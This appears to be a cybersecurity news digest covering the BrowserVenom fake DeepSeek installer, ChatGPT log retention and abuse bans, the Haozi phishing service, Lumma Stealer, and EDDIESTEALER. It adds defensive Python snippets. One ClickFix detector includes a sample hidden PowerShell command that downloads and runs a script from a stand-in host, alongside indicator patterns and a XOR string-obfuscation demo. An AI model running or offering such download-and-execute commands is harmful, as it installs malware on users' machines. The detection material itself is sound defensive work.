CyberSecurity news

FlagThis - #users

Michael Kan@PCMag Middle East ai //
A new cyber threat has emerged, targeting users eager to experiment with the DeepSeek AI model. Cybercriminals are exploiting the popularity of open-source AI by disguising malware as a legitimate installer for DeepSeek-R1. Unsuspecting victims download the "BrowserVenom" malware, a malicious program designed to steal stored credentials and session cookies and to gain access to cryptocurrency wallets. The attack highlights the growing trend of cybercriminals leveraging interest in AI to distribute malware.

This attack vector involves malicious Google ads that redirect users to a fake DeepSeek domain when they search for "deepseek r1." The fraudulent website, designed to mimic the official DeepSeek page, prompts users to download a file named "AI_Launcher_1.21.exe." Once executed, the installer displays a fake installation screen while silently installing BrowserVenom in the background. Researchers at Kaspersky traced the threat and found that the malware reconfigures browsers to route traffic through a proxy server controlled by the attackers, enabling them to intercept sensitive data.
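The proxy hijack Kaspersky describes leaves a visible artifact: an enabled proxy pointing at a host the user never configured. A minimal defensive sketch, assuming Windows-style ProxyEnable/ProxyServer values have already been read from the registry (the settings dict and allowlist here are illustrative assumptions, not part of Kaspersky's tooling):

```python
# Minimal sketch: flag a proxy configuration that routes browser traffic
# through an unexpected server, the symptom attributed to BrowserVenom.
# The settings dict and allowlist are illustrative assumptions; on a real
# Windows host the values would be read from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings.

def suspicious_proxy(settings: dict, allowlist=frozenset()) -> bool:
    """Return True if a proxy is enabled and its host is not allowlisted."""
    if not settings.get("ProxyEnable"):
        return False
    host = settings.get("ProxyServer", "").split(":")[0].lower()
    return host not in allowlist

# A machine with no proxy configured is clean:
print(suspicious_proxy({"ProxyEnable": 0}))                   # False
# An enabled proxy pointing at an unknown host warrants a look:
print(suspicious_proxy({"ProxyEnable": 1,
                        "ProxyServer": "203.0.113.7:8080"}))  # True
```

A known corporate proxy can be passed in via `allowlist` so legitimate configurations are not flagged.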

Kaspersky's investigation revealed that the BrowserVenom malware can evade many antivirus programs and has already infected computers in various countries, including Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The analysis of the phishing and distribution websites revealed Russian-language comments within the source code, suggesting the involvement of Russian-speaking threat actors. This incident serves as a reminder to verify the legitimacy of websites and software before downloading, especially when dealing with open-source AI tools that require multiple installation steps.
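The "verify the legitimacy of websites" advice can be made concrete: check that a download link's host is exactly the expected official domain or a subdomain of it, rather than merely containing the brand name. A small sketch ("deepseek.com" is assumed here as the legitimate domain, standing in for whatever official list a defender maintains):

```python
from urllib.parse import urlparse

# Sketch of "verify before downloading": accept a URL only if its host is
# exactly an expected domain or a subdomain of it. Substring matching
# ("deepseek" appears somewhere in the name) is not enough, because
# lookalike domains pass that test. "deepseek.com" is an assumption.

OFFICIAL_DOMAINS = {"deepseek.com"}

def is_official(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS)

print(is_official("https://chat.deepseek.com/"))         # True
print(is_official("https://deepseek-r1.example/setup"))  # False: lookalike
```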

Recommended read:
References :
  • gbhackers.com: Threat Actors Exploit DeepSeek-R1 Popularity to Target Windows Device Users
  • PCMag Middle East ai: 'BrowserVenom' Windows Malware Preys on Users Looking to Run DeepSeek AI
  • bsky.app: Cybercriminals are exploiting the growing interest in open source AI models by disguising malware as a legit installer for DeepSeek. Victims are unwittingly downloading the "BrowserVenom" malware, designed to steal stored credentials, session cookies, etc., and gain access to cryptocurrency wallets.
  • The Register - Software: DeepSeek installer or just malware in disguise? Click around and find out
  • Graham Cluley (Malware): Malware attack disguises itself as DeepSeek installer
  • Graham Cluley: Cybercriminals are exploiting the growing interest in open source AI models by disguising malware as a legitimate installer for DeepSeek.
  • Securelist: Toxic trend: Another malware threat targets DeepSeek
  • www.pcmag.com: Antivirus provider Kaspersky traces the threat to malicious Google ads.
  • www.techradar.com: Fake DeepSeek website found serving dangerous malware instead of the popular app.
  • ASEC: Warning Against Distribution of Malware Disguised as Research Papers (Kimsuky Group)
  • cyble.com: Over 20 Crypto Phishing Applications Found on the Play Store Stealing Mnemonic Phrases

Pierluigi Paganini@securityaffairs.com //
OpenAI is facing scrutiny over its ChatGPT user logs due to a recent court order mandating the indefinite retention of all chat data, including deleted conversations. This directive stems from a lawsuit filed by The New York Times and other news organizations, who allege that ChatGPT has been used to generate copyrighted news articles. The plaintiffs believe that even deleted chats could contain evidence of infringing outputs. OpenAI, while complying with the order, is appealing the decision, citing concerns about user privacy and potential conflicts with data privacy regulations like the EU's GDPR. The company emphasizes that this retention policy does not affect ChatGPT Enterprise or ChatGPT Edu customers, nor users with a Zero Data Retention agreement.

Sam Altman, CEO of OpenAI, has advocated for what he terms "AI privilege," suggesting that interactions with AI should be afforded the same privacy protections as communications with professionals like lawyers or doctors. This stance comes as OpenAI faces criticism for not disclosing to users that deleted and temporary chat logs had been preserved since mid-May in response to the court order. Altman argues that retaining user chats compromises their privacy, which OpenAI considers a core principle. He fears that this legal precedent could lead to a future where all AI conversations are recorded and accessible, potentially chilling free expression and innovation.

In addition to privacy concerns, OpenAI has identified and addressed malicious campaigns leveraging ChatGPT for nefarious purposes. These activities include the creation of fake IT worker resumes, the dissemination of misinformation, and assistance in cyber operations. OpenAI has banned accounts linked to ten such campaigns, including those potentially associated with North Korean IT worker schemes, Beijing-backed cyber operatives, and Russian malware distributors. These malicious actors utilized ChatGPT to craft application materials, auto-generate resumes, and even develop multi-stage malware. OpenAI is actively working to combat these abuses and safeguard its platform from being exploited for malicious activities.

Recommended read:
References :
  • chatgptiseatingtheworld.com: After filing an objection with Judge Stein, OpenAI took to the court of public opinion to seek the reversal of Magistrate Judge Wang’s broad order requiring OpenAI to preserve all ChatGPT logs of people’s chats.
  • Reclaim The Net: Private prompts once thought ephemeral could now live forever, thanks to demands from the New York Times.
  • Digital Information World: If you’ve ever used ChatGPT’s temporary chat feature thinking your conversation would vanish after closing the window — well, it turns out that wasn’t exactly the case.
  • iHLS: AI Tools Exploited in Covert Influence and Cyber Ops, OpenAI Warns
  • Schneier on Security: Report on the Malicious Uses of AI
  • The Register - Security: ChatGPT used for evil: Fake IT worker resumes, misinfo, and cyber-op assist
  • Jon Greig: Russians are using ChatGPT to incrementally improve malware, Chinese groups are using it to mass-create fake social media comments, and North Koreans are using it to refine fake resumes; OpenAI is likely only catching a fraction of nation-state use.
  • Latest news: How global threat actors are weaponizing AI now, according to OpenAI
  • The Hacker News: OpenAI has revealed that it banned a set of ChatGPT accounts that were likely operated by Russian-speaking threat actors and two Chinese nation-state hacking groups to assist with malware development, social media automation, and research about U.S. satellite communications technologies, among other things.
  • securityaffairs.com: OpenAI bans ChatGPT accounts linked to Russian, Chinese cyber ops
  • therecord.media: Russians are using ChatGPT to incrementally improve malware, Chinese groups are using it to mass-create fake social media comments, and North Koreans are using it to refine fake resumes; OpenAI is likely only catching a fraction of nation-state use.
  • siliconangle.com: OpenAI to retain deleted ChatGPT conversations following court order
  • eWEEK: ‘An Inappropriate Request’: OpenAI Appeals ChatGPT Data Retention Court Order in NYT Case
  • gbhackers.com: OpenAI Shuts Down ChatGPT Accounts Linked to Russian, Iranian & Chinese Cyber
  • Ars Technica (Policy): OpenAI is retaining all ChatGPT logs "indefinitely." Here's who's affected.
  • AI News | VentureBeat: Sam Altman calls for ‘AI privilege’ as OpenAI clarifies court order to retain temporary and deleted ChatGPT sessions
  • www.techradar.com: Sam Altman says AI chats should be as private as ‘talking to a lawyer or a doctor’, but OpenAI could soon be forced to keep your ChatGPT conversations forever
  • aithority.com: New Relic Report Shows OpenAI’s ChatGPT Dominates Among AI Developers
  • the-decoder.com: ChatGPT scams range from silly money-making ploys to calculated political meddling
  • hackread.com: OpenAI Shuts Down 10 Malicious AI Ops Linked to China, Russia, N. Korea
  • Tech Monitor: OpenAI highlights exploitative use of ChatGPT by Chinese entities

@gbhackers.com //
The Haozi Phishing-as-a-Service (PhaaS) platform has resurfaced, marking a concerning development in the cybercrime landscape. This Chinese-language operation distinguishes itself with its ease of use, comprehensive customer support, and a cartoon mouse mascot, lowering the barrier to entry for aspiring cybercriminals. Haozi provides a "plug-and-play" system, transforming complex phishing campaigns into point-and-click operations accessible to those with minimal technical expertise. The platform boasts a fully automated, web-based control panel, enabling users to manage multiple phishing campaigns, filter traffic, view stolen credentials, and fine-tune attack behavior.

Haozi's business model resembles that of legitimate software companies, offering subscription plans and à-la-carte sales. Transactions are conducted in Tether (USDT), with the associated wallet having processed over $280,000 to date. The platform also monetizes the broader attack ecosystem by selling advertising space that connects buyers to third-party services such as SMS gateways. This allows Haozi to act as a middleman, generating revenue not only from phishing kits but also from ancillary services. According to reports, the Haozi platform immediately gained nearly 2,000 followers on Telegram after its initial community on the encrypted messaging app was dismantled.

What sets Haozi apart is its fully automated installation process. Attackers simply input their server credentials into a hosted installation page, and the system automatically deploys a phishing site and admin dashboard, eliminating the need for command-line setup or server configuration. The kits themselves simulate real user experiences, with phishing templates mimicking bank verification and credit card prompts with response logic. For example, after capturing credit card details, the operator may decide to request a 2FA code based on the response received from a card transaction attempt. The resurgence of Haozi highlights the escalating threat presented by PhaaS networks and underscores the need for intensified cybersecurity training programs.

Recommended read:
References :
  • cyberpress.org: Haozi’s Plug-and-Play Phishing Attack Nets Over $280,000 from Victims
  • securityonline.info: Haozi Returns: The Phishing-as-a-Service Platform Making Cybercrime Easy
  • gbhackers.com: Haozi’s Plug-and-Play Phishing Attack Steals Over $280,000 From Users
  • www.scworld.com: Activity of Haozi phishing service surging, report finds

Nick Lucchesi@laptopmag.com //
OpenAI is planning to evolve ChatGPT into a "super-assistant" that understands users deeply and becomes their primary interface to the internet. A leaked internal document, titled "ChatGPT: H1 2025 Strategy," reveals that the company envisions ChatGPT as an "entity" that users rely on for a vast range of tasks, seamlessly integrated into various aspects of their daily lives. This includes tasks like answering questions, finding a home, contacting a lawyer, planning vacations, managing calendars, and sending emails, all aimed at making life easier for the user.

The document, dated late 2024, describes the "super-assistant" as possessing "T-shaped skills," meaning it has broad capabilities for tedious daily tasks and deep expertise for more complex tasks like coding. OpenAI aims to make ChatGPT personalized and available across various platforms, including its website, native apps, phones, email, and even third-party surfaces like Siri. The goal is for ChatGPT to act as a smart, trustworthy, and emotionally intelligent assistant capable of handling any task a person with a computer could do.

While the first half of 2025 focused on building ChatGPT into a "super-assistant," plans are now shifting to generating "enough monetizable demand to pursue these new models." OpenAI sees ChatGPT less as a tool and more as a companion for surfing the web, helping with everything from taking meeting notes and preparing presentations to catching up with friends and finding the best restaurant. The company's vision is for ChatGPT to be an integral part of users' lives, accessible no matter where they are.

Recommended read:
References :
  • www.laptopmag.com: An internal OpenAI doc reveals exactly how ChatGPT may become your "super-assistant" very soon.
  • www.tomsguide.com: ChatGPT future just revealed — get ready for a ‘super assistant’
  • Dataconomy: A recently released internal document reveals OpenAI’s strategy to evolve ChatGPT into a “super-assistant” by the first half of 2025.
  • Latest news: Starting in the first half of 2026, OpenAI plans to evolve ChatGPT into a super assistant that knows you, understands what you care about, and can help with virtually any task.
  • 9to5mac.com: ChatGPT for Mac now records meetings and can answer questions about your cloud files, highlighting further integration of OpenAI's tools into users' workflows.
  • learn.aisingapore.org: OpenAI's ChatGPT is evolving into a comprehensive assistant, with memory retention for free users, integrated with cloud files and recording meetings.
  • Shelly Palmer: ChatGPT Just Got into Your Google Drive and Dropbox, Too
  • Maginative: ChatGPT Can Now Search Your Files, Emails, and Meeting Notes

@blog.checkpoint.com //
Microsoft has revealed that Lumma Stealer malware has infected over 394,000 Windows computers across the globe. This data-stealing malware has been actively employed by financially motivated threat actors targeting various industries. Microsoft Threat Intelligence has been tracking the growth and increasing sophistication of Lumma Stealer for over a year, highlighting its persistent threat in the cyber landscape. The malware is designed to harvest sensitive information from infected systems, posing a significant risk to users and organizations alike.

Microsoft, in collaboration with industry partners and international law enforcement, has taken action to disrupt the infrastructure supporting Lumma Stealer. However, the developers behind the malware are reportedly making significant efforts to restore servers and bring the operation back online, indicating the tenacity of the threat. Despite these efforts, security researchers note that the Lumma Stealer operation has suffered reputational damage, potentially making it harder to regain trust among cybercriminals.

In related news, a new Rust-based information stealer called EDDIESTEALER is actively spreading through fake CAPTCHA campaigns, using the ClickFix social engineering tactic to trick users into running malicious PowerShell scripts. EDDIESTEALER targets crypto wallets, browser data, and credentials, demonstrating a continued trend of malware developers utilizing Rust for its enhanced stealth and stability. These developments underscore the importance of vigilance and robust cybersecurity practices to protect against evolving malware threats.

Recommended read:
References :
  • www.microsoft.com: Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer
  • Catalin Cimpanu: Mastodon: The developers of the Lumma Stealer malware are making significant efforts to restore servers and return online.
  • blog.checkpoint.com: Lumma infostealer: Down but not out
  • community.emergingthreats.net: Summary: 46 new OPEN, 153 new PRO (46 + 107) Added rules: Open: 2062667 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (acoustpbns .run) (malware.rules)
  • Catalin Cimpanu: -New npm and PyPI malware (of course) -New DataCarry ransomware gang -Lumma Stealer infrastructure is returning online -Haozi PhaaS returns -T-Rex cryptominer infects South Korean internet cafes -Profiles on Ukrainian hacker group BO Team and Russian cyber unit GRU Unit 29155

@securityonline.info //
Elastic Security Labs has identified a new information stealer called EDDIESTEALER, a Rust-based malware distributed through fake CAPTCHA campaigns. These campaigns trick users into executing malicious PowerShell scripts, which then deploy the infostealer onto their systems. EDDIESTEALER is hosted on multiple adversary-controlled web properties and employs the ClickFix social engineering tactic, luring unsuspecting individuals with the promise of CAPTCHA verification. The malware aims to harvest sensitive data, including credentials, browser information, and cryptocurrency wallet details.

This attack chain begins with threat actors compromising legitimate websites, injecting malicious JavaScript payloads that present bogus CAPTCHA check pages. Users are instructed to copy and paste a PowerShell command into their Windows terminal as verification, which retrieves and executes a JavaScript file called gverify.js. This script, in turn, fetches the EDDIESTEALER binary from a remote server, saving it in the downloads folder with a pseudorandom filename. The malware dynamically retrieves configuration data from a command-and-control server, allowing it to adapt its behavior and target specific programs.
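Commands pasted into the terminal during ClickFix lures tend to share a handful of download-and-execute traits. As an illustration of what defenders look for, a heuristic scorer over common indicators (the patterns and the sample command are illustrative assumptions, not a complete detector or the campaign's real payload):

```python
import re

# Illustrative sketch: count ClickFix-style indicators in a PowerShell
# one-liner of the kind victims are told to paste as "CAPTCHA verification".
# The indicator list is a simplified assumption, not a production ruleset.

INDICATORS = [
    r"-enc(odedcommand)?\b",          # encoded command payloads
    r"-w(indowstyle)?\s+hidden",      # hidden window execution
    r"\b(invoke-webrequest|iwr|curl)\b",  # remote download
    r"\b(invoke-expression|iex)\b",       # in-memory execution
    r"download(string|file)",             # WebClient download helpers
]

def clickfix_score(cmd: str) -> int:
    cmd = cmd.lower()
    return sum(bool(re.search(p, cmd)) for p in INDICATORS)

sample = 'powershell -w hidden -c "iex (iwr https://malicious.example/gverify.js)"'
print(clickfix_score(sample))        # 3: hidden window, download, execution
print(clickfix_score("get-childitem"))  # 0: benign command
```

A score above zero on a command a website asked the user to paste is a strong signal to stop and investigate.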

EDDIESTEALER is designed to gather system metadata and siphon data of interest from infected hosts, including cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging apps like Telegram. The malware incorporates string encryption, a custom WinAPI lookup mechanism, and a mutex to prevent multiple instances from running. It also includes anti-sandbox checks and a self-deletion technique using NTFS Alternate Data Streams to evade detection. The dynamic C2 tasking gives attackers flexibility, highlighting the ongoing threat of ClickFix campaigns and the increasing use of Rust in malware development.
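The summary notes that EDDIESTEALER uses string encryption but does not document the exact scheme. As a generic illustration of why infostealers do this, a minimal repeating-key XOR obfuscation (the key and plaintext below are invented for the demo and are not EDDIESTEALER's real format):

```python
# Generic illustration of string obfuscation as reported in infostealers:
# a repeating-key XOR keeps indicator strings (C2 hosts, target file paths)
# out of plain sight in the binary, defeating naive string scanning.
# EDDIESTEALER's actual scheme is not documented here; key and plaintext
# are assumptions made for this sketch.

def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

KEY = b"\x5a\xa3"
blob = xor_bytes(b"wallet.dat", KEY)   # what a scanner sees in the binary
assert b"wallet" not in blob           # plaintext is no longer visible
print(xor_bytes(blob, KEY))            # round-trip recovers b'wallet.dat'
```

Analysts reverse such schemes to extract configuration and indicators of compromise from samples; the same symmetry that lets the malware decrypt at runtime lets a researcher decrypt statically once the key is found.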

Recommended read:
References :
  • Virus Bulletin: Elastic Security Labs has uncovered a novel Rust-based infostealer distributed via Fake CAPTCHA campaigns that trick users into executing a malicious PowerShell script. EDDIESTEALER is hosted on multiple adversary-controlled web properties.
  • The Hacker News: New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data
  • www.scworld.com: ClickFix used to spread novel Rust-based infostealer
  • Anonymous: "Prove you're not a robot" turns into full system breach! Hackers are using fake CAPTCHA checks to deploy a stealthy new Rust malware, EDDIESTEALER, via ClickFix, a social engineering trick abusing PowerShell on Windows.
  • securityonline.info: EDDIESTEALER: New Rust Infostealer Uses Fake CAPTCHAs to Hijack Crypto Wallets & Data
  • malware.news: Cybersecurity researchers have identified a sophisticated malware campaign utilizing deceptive CAPTCHA interfaces to distribute EddieStealer, a Rust-based information stealing malware that targets sensitive user data across multiple platforms.
  • cyberpress.org: ClickFix Technique Used by Threat Actors to Spread EddieStealer Malware
  • gbhackers.com: Threat Actors Leverage ClickFix Technique to Deploy EddieStealer Malware